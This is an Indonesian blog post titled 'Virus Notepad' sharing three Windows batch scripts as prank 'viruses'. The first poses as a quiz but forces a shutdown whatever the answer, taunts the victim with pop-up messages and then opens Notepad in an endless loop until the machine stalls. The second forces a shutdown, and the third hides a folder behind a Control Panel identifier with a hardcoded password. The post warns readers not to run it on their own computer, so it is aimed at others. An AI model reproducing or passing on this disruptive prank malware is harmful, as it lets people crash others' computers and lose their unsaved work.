Virus Notepad




@echo off
title quiz hari ini by:kracky Faster
...:menu
cls
echo Apa yang lo pertama liad?
pause
echo pilih yang mana:
echo 1. Hal Ga Jelas..
echo 2. FUCK DAMN!!
echo 3. Bomat
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 shutdown -s -t 45
if %input%==3 shutdown -s -t 60
msg * ea.. mampus
msg * ngaca dulu gih
msg * hayo loo.. fbnya kok begini?
msg * hayo2..
msg * pusing kan? makanya jangan banyak gaya..
msg * mampus dah...
msg * bukan salah gue ye
msg * salah lo sendiri buka neh virus..
msg * gue ga tanggung jwab
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



ATAU


@echo off
:CONFIRM
ECHO SHUTDOWN KOMPUTER?(Y/N)
set/p "cho=>"
if %cho%==Y goto SHUTDOWN
if %cho%==y goto SHUTDOWN
if %cho%==N goto END
if %cho%==n goto END
goto CONFIRM
:SHUTDOWN
shutdown -S -T 30 -F -c "silahkan matikan semua program"
goto END
End:


ATAU

@ECHO OFF
titipan kunci folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p "pass=>"
if NOT %pass%== jufriandi goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End

simpan dengan format .exe
warning!!!
Jangan buka pada komputer anda!!!

0 komentar :

Posting Komentar

Berkomentarlah yang baik.